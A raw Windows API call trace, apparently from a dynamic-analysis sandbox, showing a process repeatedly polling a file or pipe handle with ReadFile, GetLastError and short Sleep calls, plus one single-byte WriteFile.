	[0236.834] Sleep (dwMilliseconds=0xa) 
	[0236.872] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.872] GetLastError () returned 0x218
	[0236.873] Sleep (dwMilliseconds=0xa) 
	[0236.920] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.920] GetLastError () returned 0x218
	[0236.920] Sleep (dwMilliseconds=0xa) 
	[0236.948] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.948] GetLastError () returned 0x218
	[0236.948] Sleep (dwMilliseconds=0xa) 
	[0236.950] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.950] GetLastError () returned 0x218
	[0236.950] Sleep (dwMilliseconds=0xa) 
	[0236.965] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.966] GetLastError () returned 0x218
	[0236.966] Sleep (dwMilliseconds=0xa) 
	[0236.981] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.981] GetLastError () returned 0x218
	[0236.981] Sleep (dwMilliseconds=0xa) 
	[0236.997] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.998] GetLastError () returned 0x218
	[0236.998] Sleep (dwMilliseconds=0xa) 
	[0237.029] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.029] GetLastError () returned 0x218
	[0237.030] Sleep (dwMilliseconds=0xa) 
	[0237.043] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.043] GetLastError () returned 0x218
	[0237.044] Sleep (dwMilliseconds=0xa) 
	[0237.090] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.090] GetLastError () returned 0x218
	[0237.090] Sleep (dwMilliseconds=0xa) 
	[0237.137] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.137] GetLastError () returned 0x218
	[0237.137] Sleep (dwMilliseconds=0xa) 
	[0237.199] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.200] GetLastError () returned 0x218
	[0237.200] Sleep (dwMilliseconds=0xa) 
	[0237.246] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.246] GetLastError () returned 0x218
	[0237.247] Sleep (dwMilliseconds=0xa) 
	[0237.272] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.272] GetLastError () returned 0x218
	[0237.272] Sleep (dwMilliseconds=0xa) 
	[0237.321] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.321] GetLastError () returned 0x218
	[0237.321] Sleep (dwMilliseconds=0xa) 
	[0237.324] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.324] GetLastError () returned 0x218
	[0237.324] Sleep (dwMilliseconds=0xa) 
	[0237.340] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.340] GetLastError () returned 0x218
	[0237.340] Sleep (dwMilliseconds=0xa) 
	[0237.355] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.355] GetLastError () returned 0x218
	[0237.355] Sleep (dwMilliseconds=0xa) 
	[0237.372] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.372] GetLastError () returned 0x218
	[0237.373] Sleep (dwMilliseconds=0xa) 
	[0237.418] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.418] GetLastError () returned 0x218
	[0237.418] Sleep (dwMilliseconds=0xa) 
	[0237.464] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.464] GetLastError () returned 0x218
	[0237.464] Sleep (dwMilliseconds=0xa) 
	[0237.508] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.508] GetLastError () returned 0x218
	[0237.508] Sleep (dwMilliseconds=0xa) 
	[0237.512] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.513] GetLastError () returned 0x218
	[0237.513] Sleep (dwMilliseconds=0xa) 
	[0237.528] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.528] GetLastError () returned 0x218
	[0237.528] Sleep (dwMilliseconds=0xa) 
	[0237.542] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.542] GetLastError () returned 0x218
	[0237.542] Sleep (dwMilliseconds=0xa) 
	[0237.559] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.559] GetLastError () returned 0x218
	[0237.559] Sleep (dwMilliseconds=0xa) 
	[0237.574] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.574] GetLastError () returned 0x218
	[0237.574] Sleep (dwMilliseconds=0xa) 
	[0237.590] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.590] GetLastError () returned 0x218
	[0237.590] Sleep (dwMilliseconds=0xa) 
	[0237.613] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0237.613] GetLastError () returned 0x218
	[0237.613] Sleep (dwMilliseconds=0x3e8) 
	[0238.619] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0238.619] Sleep (dwMilliseconds=0xa) 
	[0238.636] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.637] GetLastError () returned 0x218
	[0238.637] Sleep (dwMilliseconds=0xa) 
	[0238.650] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.650] GetLastError () returned 0x218
	[0238.650] Sleep (dwMilliseconds=0xa) 
	[0238.666] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.666] GetLastError () returned 0x218
	[0238.666] Sleep (dwMilliseconds=0xa) 
	[0238.682] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.682] GetLastError () returned 0x218
	[0238.682] Sleep (dwMilliseconds=0xa) 
	[0238.728] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.728] GetLastError () returned 0x218
	[0238.728] Sleep (dwMilliseconds=0xa) 
	[0238.775] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.775] GetLastError () returned 0x218
	[0238.776] Sleep (dwMilliseconds=0xa) 
	[0238.819] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.819] GetLastError () returned 0x218
	[0238.819] Sleep (dwMilliseconds=0xa) 
	[0238.821] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.821] GetLastError () returned 0x218
	[0238.821] Sleep (dwMilliseconds=0xa) 
	[0238.838] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.838] GetLastError () returned 0x218
	[0238.838] Sleep (dwMilliseconds=0xa) 
	[0238.853] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.853] GetLastError () returned 0x218
	[0238.853] Sleep (dwMilliseconds=0xa) 
	[0238.869] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.869] GetLastError () returned 0x218
	[0238.869] Sleep (dwMilliseconds=0xa) 
	[0238.885] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.885] GetLastError () returned 0x218
	[0238.885] Sleep (dwMilliseconds=0xa) 
	[0238.900] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.900] GetLastError () returned 0x218
	[0238.900] Sleep (dwMilliseconds=0xa) 
	[0238.915] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.915] GetLastError () returned 0x218
	[0238.916] Sleep (dwMilliseconds=0xa) 
	[0238.962] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0238.962] GetLastError () returned 0x218
	[0238.962] Sleep (dwMilliseconds=0xa) 
	[0239.009] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.009] GetLastError () returned 0x218
	[0239.009] Sleep (dwMilliseconds=0xa) 
	[0239.053] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.053] GetLastError () returned 0x218
	[0239.053] Sleep (dwMilliseconds=0xa) 
	[0239.055] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.056] GetLastError () returned 0x218
	[0239.056] Sleep (dwMilliseconds=0xa) 
	[0239.071] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.072] GetLastError () returned 0x218
	[0239.072] Sleep (dwMilliseconds=0xa) 
	[0239.087] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.087] GetLastError () returned 0x218
	[0239.087] Sleep (dwMilliseconds=0xa) 
	[0239.284] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.284] GetLastError () returned 0x218
	[0239.284] Sleep (dwMilliseconds=0xa) 
	[0239.369] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.369] GetLastError () returned 0x218
	[0239.369] Sleep (dwMilliseconds=0xa) 
	[0239.437] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.437] GetLastError () returned 0x218
	[0239.437] Sleep (dwMilliseconds=0xa) 
	[0239.477] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.477] GetLastError () returned 0x218
	[0239.477] Sleep (dwMilliseconds=0xa) 
	[0239.496] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.496] GetLastError () returned 0x218
	[0239.496] Sleep (dwMilliseconds=0xa) 
	[0239.510] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.510] GetLastError () returned 0x218
	[0239.510] Sleep (dwMilliseconds=0xa) 
	[0239.524] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.524] GetLastError () returned 0x218
	[0239.524] Sleep (dwMilliseconds=0xa) 
	[0239.539] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.540] GetLastError () returned 0x218
	[0239.540] Sleep (dwMilliseconds=0xa) 
	[0239.588] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.588] GetLastError () returned 0x218
	[0239.588] Sleep (dwMilliseconds=0xa) 
	[0239.633] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.633] GetLastError () returned 0x218
	[0239.633] Sleep (dwMilliseconds=0xa) 
	[0239.726] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.726] GetLastError () returned 0x218
	[0239.726] Sleep (dwMilliseconds=0xa) 
	[0239.820] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.820] GetLastError () returned 0x218
	[0239.820] Sleep (dwMilliseconds=0xa) 
	[0239.890] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.890] GetLastError () returned 0x218
	[0239.890] Sleep (dwMilliseconds=0xa) 
	[0239.945] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.945] GetLastError () returned 0x218
	[0239.945] Sleep (dwMilliseconds=0xa) 
	[0239.991] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0239.991] GetLastError () returned 0x218
	[0239.991] Sleep (dwMilliseconds=0xa) 
	[0240.079] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.079] GetLastError () returned 0x218
	[0240.079] Sleep (dwMilliseconds=0xa) 
	[0240.167] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.167] GetLastError () returned 0x218
	[0240.167] Sleep (dwMilliseconds=0xa) 
	[0240.261] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.261] GetLastError () returned 0x218
	[0240.262] Sleep (dwMilliseconds=0xa) 
	[0240.305] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.305] GetLastError () returned 0x218
	[0240.305] Sleep (dwMilliseconds=0xa) 
	[0240.363] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.363] GetLastError () returned 0x218
	[0240.363] Sleep (dwMilliseconds=0xa) 
	[0240.387] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.387] GetLastError () returned 0x218
	[0240.387] Sleep (dwMilliseconds=0xa) 
	[0240.442] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.442] GetLastError () returned 0x218
	[0240.442] Sleep (dwMilliseconds=0xa) 
	[0240.479] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.479] GetLastError () returned 0x218
	[0240.479] Sleep (dwMilliseconds=0xa) 
	[0240.524] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.524] GetLastError () returned 0x218
	[0240.524] Sleep (dwMilliseconds=0xa) 
	[0240.550] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.550] GetLastError () returned 0x218
	[0240.550] Sleep (dwMilliseconds=0xa) 
	[0240.579] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.579] GetLastError () returned 0x218
	[0240.579] Sleep (dwMilliseconds=0xa) 
	[0240.584] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.584] GetLastError () returned 0x218
	[0240.584] Sleep (dwMilliseconds=0xa) 
	[0240.599] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.599] GetLastError () returned 0x218
	[0240.600] Sleep (dwMilliseconds=0xa) 
	[0240.615] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.615] GetLastError () returned 0x218
	[0240.615] Sleep (dwMilliseconds=0xa) 
	[0240.631] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
